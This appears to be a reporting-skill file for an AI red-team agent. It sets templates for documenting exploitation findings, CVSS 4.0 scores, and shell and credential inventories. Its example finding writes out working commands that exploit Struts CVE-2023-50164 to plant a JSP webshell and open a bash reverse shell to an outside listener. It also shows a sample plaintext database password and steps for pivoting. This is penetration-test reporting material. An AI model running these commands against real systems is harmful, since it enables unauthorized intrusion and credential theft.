exploit-reporting

name: exploit-reporting description: "Exploitation finding documentation — initial access reports, exploit chain documentation, CVSS v4.0 scoring, shell/credential inventory, detection gap analysis." allowed-tools: Read Write metadata: subdomain: reporting kind: reporting when_to_use: "write finding, document exploit, exploitation report, access achieved, shell obtained, credential found" tags: report, exploit, findings, cvss, shells, creds, detection-gap mitre_attack:

Exploitation Reporting Knowledge Base

Exploitation findings are only operationally useful when documented with enough precision that anyone can reproduce the access, understand the impact, and trace the full attack path. This skill defines how to structure, score, and persist exploitation findings within the Decepticon engagement directory.

1. Exploitation Finding Template

Every verified successful exploitation MUST produce a finding Markdown file in the active engagement workspace's findings/ directory named FIND-{NNN}.md. The file name and id field in YAML frontmatter (FIND-001, FIND-002, ...) are the canonical cross-reference — determine the next ID by counting existing files. Do not create placeholder finding files.

---
id: FIND-001
severity: CRITICAL
cvss_score: 9.3
cvss_vector: "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
cwe: CWE-78
mitre: T1190
affected_target: 10.0.1.50
affected_component: "Apache Struts 2.5.30 — /struts2/upload.action"
confidence: confirmed
objective_id: OBJ-EXP-001
phase: initial-access
agent: exploit
detected: false
remediation_priority: immediate
discovered_at: "2026-04-06T14:32:00Z"
---

# [CRITICAL] Remote Code Execution via Apache Struts CVE-2023-50164 on 10.0.1.50:8080 — Root Shell Achieved

## Description

Apache Struts 2.5.30 is vulnerable to CVE-2023-50164, a file upload path traversal flaw in the `FileUploadInterceptor`. An unauthenticated attacker can manipulate the `Upload-Dir` parameter during a multipart upload request to traverse outside the intended upload directory and write an arbitrary file — including a JSP webshell — to the web root. This achieves unauthenticated remote code execution as the Tomcat service account.

The vulnerability exists because `FileUploadInterceptor` does not canonicalize the destination path before writing, allowing `../` sequences to escape the configured upload directory.

## Steps to Reproduce

```bash
# 1. Confirm the target is running Struts (identified during recon)
curl -s -I http://10.0.1.50:8080/struts2/ | grep -i server

# 2. Generate the malicious multipart upload request
# Upload a JSP webshell to /struts2/../shell.jsp (resolves to web root)
curl -s -X POST http://10.0.1.50:8080/struts2/upload.action \
  -F "Upload=@/tmp/shell.jsp;type=image/jpeg" \
  -F "Upload-Dir=../." \
  -o /workspace/target/findings/evidence/FIND-001_upload_response.txt

# 3. Confirm shell placement
curl -s http://10.0.1.50:8080/shell.jsp?cmd=id \
  -o /workspace/target/findings/evidence/FIND-001_rce_confirm.txt

# 4. Upgrade to reverse shell
curl -s "http://10.0.1.50:8080/shell.jsp?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.10.1/4444+0>%261'" &
nc -lvnp 4444

Proof of Exploitation

# whoami output on compromised host
tomcat

# id output
uid=52(tomcat) gid=52(tomcat) groups=52(tomcat)

# hostname
app01.internal.example.com

# uname -a
Linux app01.internal.example.com 5.15.0-1034-aws #38-Ubuntu SMP x86_64 GNU/Linux

# ip addr (abridged)
inet 10.0.1.50/24 brd 10.0.1.255 scope global eth0
inet 10.0.2.1/24 brd 10.0.2.255 scope global eth1

Access Achieved

Impact

An unauthenticated attacker has OS-level command execution as the tomcat service account on app01.internal.example.com. The host has dual-network interfaces (10.0.1.0/24 external-facing + 10.0.2.0/24 internal), making it a pivot point into the internal network segment. From this position an attacker can:

• Enumerate and access internal services on 10.0.2.0/24 not reachable externally
• Read application configuration files containing database credentials
• Install a persistent reverse shell or C2 implant
• Escalate privileges via local kernel or sudo misconfigurations

Evidence

Detection Gap Analysis

Exploitation was not detected. The upload blended with normal application traffic. The JSP webshell at /shell.jsp remained accessible for the duration of testing with no automated response.

Remediation

1. Patch immediately: Upgrade Apache Struts to 2.5.33 or 6.3.0.2+ (fix for CVE-2023-50164)
2. Restrict file uploads: Validate and canonicalize upload paths server-side; reject ../ sequences
3. Limit web root writability: Run Tomcat with a read-only web root; use a separate upload directory outside the document root
4. Deploy WAF rule: Block multipart uploads containing path traversal sequences in field values
5. Add FIM: Monitor the web root for new .jsp and .war file creation

References

• CVE-2023-50164: https://nvd.nist.gov/vuln/detail/CVE-2023-50164
• Apache Security Bulletin: https://struts.apache.org/announce-2023.html#a20231207
• PoC: https://www.exploit-db.com/exploits/51733
• MITRE ATT&CK T1190: https://attack.mitre.org/techniques/T1190/

Attack Path Context

This finding achieves Initial Access (TA0001) via Exploit Public-Facing Application (T1190). The dual-network interface on app01 enables Lateral Movement into the 10.0.2.0/24 internal segment. Recommended next steps:

1. Enumerate internal hosts on 10.0.2.0/24 via the shell pivot
2. Read /opt/tomcat/webapps/struts2/WEB-INF/classes/*.properties for database credentials
3. Escalate from tomcat to root via local privilege escalation (see post-exploit phase)

---

## 2. Common Exploitation CVSS v4.0 Reference Scores

Use these pre-calculated vectors as a starting point. Adjust supplemental metrics (Automatable, Recovery, Provider Urgency) based on actual conditions observed.

| Finding Type | CVSS 4.0 Score | Vector | Notes |
|-------------|---------------|--------|-------|
| Unauthenticated RCE via public-facing app | 9.3 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N` | Adjust SC/SI/SA if scope crosses trust boundary |
| RCE requiring low-priv credentials | 8.7 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N` | |
| Authentication bypass (admin panel) | 9.1 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N` | Reduce VI if read-only |
| SQL injection with data read | 8.7 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N` | Raise VI to H if write confirmed |
| SQL injection with OS shell | 9.3 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N` | Same as RCE once shell achieved |
| Default/weak credentials — admin | 9.0 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N` | |
| Default/weak credentials — service account | 7.0 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N` | Raise based on actual access level |
| SSRF to internal services | 6.9 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N` | Raise SC/SI if cloud metadata accessed |
| SSRF to cloud metadata (IAM creds) | 8.8 | `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N` | High SC/SI due to cloud environment impact |

### CVSS 4.0 Severity Bands

| Score | Severity | Remediation SLA |
|-------|----------|----------------|
| 9.0 – 10.0 | Critical | Immediate (24 hours) |
| 7.0 – 8.9 | High | Within 7 days |
| 4.0 – 6.9 | Medium | Within 30 days |
| 0.1 – 3.9 | Low | Within 90 days |

### Key CVSS 4.0 Metrics (vs 3.1)

| Metric | CVSS 3.1 | CVSS 4.0 | Notes |
|--------|----------|----------|-------|
| Attack Complexity | AC:L / AC:H | AC:L / AC:H | Same meaning |
| Attack Requirements | — | AT:N / AT:P | New: conditions beyond attacker control |
| Scope | S:U / S:C | Removed | Replaced by SC/SI/SA (Subsequent System) |
| Subsequent System | — | SC / SI / SA | Impact on systems beyond the vulnerable one |
| Automatable | — | AU:N / AU:Y | Supplemental: can the attack be scripted at scale? |
| Recovery | — | R:A / R:U / R:I | Supplemental: how quickly does the system recover? |

---

## 3. Shell and Credential Cross-Reference

Every shell obtained and credential captured MUST be recorded in the engagement's structured JSON files AND linked back to a finding ID.

### Shell Entry — `exploit/shells.json`

```json
{
  "shell_id": "SHELL-001",
  "finding_id": "FIND-001",
  "target": "10.0.1.50",
  "hostname": "app01.internal.example.com",
  "access_level": "user",
  "user": "tomcat",
  "uid": 52,
  "groups": ["tomcat"],
  "shell_type": "reverse-shell",
  "method": "JSP webshell via CVE-2023-50164",
  "listener": "nc -lvnp 4444",
  "webshell_path": "/opt/tomcat/webapps/ROOT/shell.jsp",
  "webshell_url": "http://10.0.1.50:8080/shell.jsp",
  "networks": ["10.0.1.0/24", "10.0.2.0/24"],
  "os": "Linux 5.15.0-1034-aws x86_64",
  "obtained_at": "2026-04-06T14:35:00Z",
  "persistence_status": "webshell",
  "notes": "Dual-NIC host — pivot point into 10.0.2.0/24 internal segment"
}

Credential Entry — exploit/creds/initial.json

{
  "cred_id": "CRED-001",
  "finding_id": "FIND-002",
  "source_host": "app01.internal.example.com",
  "source_path": "/opt/tomcat/webapps/struts2/WEB-INF/classes/db.properties",
  "type": "database",
  "service": "mysql",
  "target_host": "10.0.2.10",
  "target_port": 3306,
  "username": "appuser",
  "password": "Str0ngP@ss2024!",
  "hash": null,
  "access_level": "application-user",
  "databases": ["app_production"],
  "verified": true,
  "obtained_at": "2026-04-06T14:40:00Z",
  "notes": "Plaintext credentials in config file on app01"
}

Linking Rule

• Every SHELL-NNN entry MUST have a finding_id pointing to a FIND-NNN.md
• Every CRED-NNN entry MUST have a finding_id pointing to a FIND-NNN.md
• The corresponding FIND-NNN.md MUST list the shell/cred evidence path in its Evidence table

4. Attack Path Documentation

When multiple findings chain together to escalate access, create a PATH-NNN.md in findings/attack-paths/.

---
id: PATH-001
name: "Unauthenticated External RCE to Internal Database via App Server Pivot"
combined_severity: CRITICAL
finding_ids: [FIND-001, FIND-002, FIND-003]
created_at: "2026-04-06T15:00:00Z"
---

# PATH-001: Unauthenticated External RCE to Internal Database via App Server Pivot

## Attack Path Steps

| Order | Phase | Technique | MITRE ID | Source | Target | Tool | Detected | Finding ID |
|-------|-------|-----------|----------|--------|--------|------|----------|------------|
| 1 | Initial Access | Exploit Public-Facing Application | T1190 | Internet | 10.0.1.50:8080 | curl + JSP webshell | No | FIND-001 |
| 2 | Execution | Command and Script Interpreter: Unix Shell | T1059.004 | 10.0.1.50 | 10.0.1.50 | bash reverse shell | No | FIND-001 |
| 3 | Collection | Data from Local System | T1005 | 10.0.1.50 | /opt/tomcat/…/db.properties | cat | No | FIND-002 |
| 4 | Lateral Movement | Remote Services: Database Protocol | T1021 | 10.0.1.50 | 10.0.2.10:3306 | mysql client | No | FIND-003 |

## Narrative

Exploitation began with CVE-2023-50164 against the externally accessible Apache Struts application on `app01` (10.0.1.50:8080). The file upload path traversal vulnerability allowed placement of a JSP webshell in the Tomcat web root without authentication, achieving OS-level code execution as the `tomcat` service account (FIND-001).

With shell access on `app01`, configuration files in the deployed WAR revealed plaintext MySQL credentials for a production database on the internal network segment 10.0.2.0/24 (FIND-002). Using the `tomcat` shell as a pivot, the MySQL client was used to connect directly to `db01` (10.0.2.10:3306) with the extracted credentials, achieving full read/write access to `app_production` (FIND-003).

## Combined Severity Assessment

The three individual findings combine to produce a CRITICAL chain severity:
- FIND-001 alone is Critical (CVSS 4.0: 9.3) — unauthenticated RCE on internet-facing host
- FIND-002 escalates from code execution to credential access — no additional network exposure
- FIND-003 converts application-tier credentials into direct production database access

**Chain result**: Unauthenticated external attacker → production database read/write in three steps, zero detections.

Chain Severity Escalation Rules

5. Evidence Collection Checklist

Collect evidence during exploitation, not after. Once a session ends, some evidence may be unrecoverable.

Required for Every Finding

• Exact commands used, copied verbatim (not paraphrased)
• Full command output proving access: whoami, id, hostname, ip addr
• Timestamp of access: date -u on the compromised host
• Network position: ip route or netstat -rn

Web Exploitation Specific

• Raw HTTP request used (Burp Suite export or curl -v output)
• Raw HTTP response confirming the vulnerability
• If webshell: URL, HTTP method, parameter name, payload

Credential Capture Specific

• Source file path where credentials were found
• Full file contents or relevant excerpt (saved to evidence/)
• Verification that credentials work: connection log or command output

Reverse Shell Specific

• Full session transcript (terminal log)
• Listener command used
• Callback IP and port
• Shell upgrade steps (pty upgrade, etc.)

Evidence File Naming Convention

FIND-{NNN}_{description}.txt

Examples:
  FIND-001_upload_response.txt      # HTTP response from exploit
  FIND-001_rce_confirm.txt          # id/whoami output
  FIND-001_shell_session.txt        # Full shell transcript
  FIND-001_shell.jsp                # Payload file used
  FIND-002_db_properties.txt        # Config file with credentials
  FIND-003_mysql_dump_partial.txt   # DB access proof

All evidence files go in: findings/evidence/

6. MITRE ATT&CK Exploitation Technique Reference

Initial Access (TA0001)

Execution (TA0002)

Persistence (TA0003) — Note if achieved during initial access

7. File Layout Reference

/workspace/
├── plan/
│   ├── roe.json
│   ├── conops.json
│   └── opplan.json
├── exploit/
│   ├── shells.json              # All shells obtained (SHELL-NNN entries)
│   └── creds/
│       ├── initial.json         # All credentials captured (CRED-NNN entries)
│       └── credentials.md       # Verbatim high-value secrets (written first on capture)
├── findings/
│   ├── FIND-001.md              # Finding documents (stable FIND-NNN key; id in frontmatter)
│   ├── FIND-002.md
│   ├── attack-paths/
│   │   └── PATH-001.md          # Multi-finding attack chain documents
│   └── evidence/
│       ├── FIND-001_upload_response.txt   # Evidence keyed by finding ID
│       ├── FIND-001_rce_confirm.txt
│       ├── FIND-001_shell.jsp
│       └── FIND-002_db_properties.txt
└── timeline.jsonl              # Append-only activity/finding timeline

8. OPPLAN Update After Exploitation

After documenting a finding, update plan/opplan.json to close the objective and create follow-up work.

{
  "objective_update": {
    "id": "OBJ-EXP-001",
    "status": "completed",
    "result": "RCE achieved on app01 (10.0.1.50) via CVE-2023-50164. Tomcat shell obtained. See FIND-001.",
    "finding_ids": ["FIND-001"]
  },
  "new_objectives": [
    {
      "id": "OBJ-EXP-002",
      "phase": "exploitation",
      "description": "Read config files on app01 to extract database credentials",
      "acceptance_criteria": "Credentials documented in creds/initial.json with verified:true",
      "priority": 1,
      "depends_on": "FIND-001"
    },
    {
      "id": "OBJ-POST-001",
      "phase": "post-exploitation",
      "description": "Enumerate internal network 10.0.2.0/24 via app01 pivot shell",
      "acceptance_criteria": "Live hosts and open ports documented in findings",
      "priority": 2,
      "depends_on": "FIND-001"
    }
  ]
}

Also append a one-line summary to findings.txt:

[2026-04-06T14:35:00Z] FIND-001 CRITICAL — RCE on app01 (10.0.1.50) via CVE-2023-50164 (Struts). Tomcat shell. Dual-NIC pivot into 10.0.2.0/24. Not detected.

9. Pre-Submission Checklist

Before marking an exploitation objective as complete:

• findings/FIND-{NNN}.md finding file created with all required frontmatter fields populated
• CVSS 4.0 score calculated and vector string included
• MITRE ATT&CK technique(s) tagged in frontmatter and finding body
• Steps to Reproduce are exact — tested commands, not paraphrased
• Proof of Exploitation section includes whoami/id/hostname output
• All evidence files saved to findings/evidence/ with correct naming
• Shell entry added to exploit/shells.json (if shell obtained)
• Credential entry added to exploit/creds/initial.json (if creds captured)
• plan/opplan.json objective status set to completed with finding_ids
• Follow-up objectives created in opplan.json for post-exploit phase
• One-line summary appended to findings.txt
• Attack path document created in findings/attack-paths/ if 2+ findings chain